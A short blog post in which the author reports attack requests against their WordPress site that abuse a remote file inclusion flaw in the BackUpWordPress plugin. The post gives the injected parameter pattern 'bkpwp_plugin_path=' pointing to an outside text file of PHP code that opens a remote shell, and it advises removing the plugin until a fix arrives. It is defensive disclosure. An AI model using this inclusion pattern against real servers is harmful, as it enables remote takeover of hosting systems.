Over the last few days I’ve been noticing quite a few hits on my blog for various, non-existant pages. Each of these hits takes the form of:
bkpwp_plugin_path=URL of a text file on an another website
Checking the URL in the page request returns a text file containing PHP code that attempts to launch a remote shell.
The first part of the page request is a reference to a plugin for WordPress called BackUpWordPress This plugin automatically backs up your WordPress database and files. According to Security Focus, the plugin does not properly check user provided input, thereby allowing remote users to possibly access your hosting providers server.
At this point in time there is no update available to resolve this issue. If you’re using this plugin, then until a fix is made available, the safest option is to deactivate and remove the plugin.
Update: Since I wrote this piece, the BackUpWordPress plugin has been updated to fix this issue. Kudos to the developer for releasing a fix so quickly. More details in this comment.